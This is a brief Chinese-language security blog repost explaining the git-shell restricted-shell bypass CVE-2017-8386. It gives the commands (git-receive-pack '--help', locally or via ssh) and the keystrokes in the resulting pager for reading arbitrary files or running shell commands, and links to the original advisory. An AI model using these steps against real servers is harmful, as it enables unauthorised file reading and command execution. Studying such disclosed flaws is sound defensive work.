Git Shell Bypass

华盟原创文章投稿奖励计划

通过git读文件:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

打开以后按shift+e,然后输入要读的文件路径

Git Shell Bypass

通过git执行命令:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

输入!后输入要执行的命令:

Git Shell Bypass

详情:

https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

文章来源:Evi1cg's blog   

本文来源Evi1cg,经授权后由congtou发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复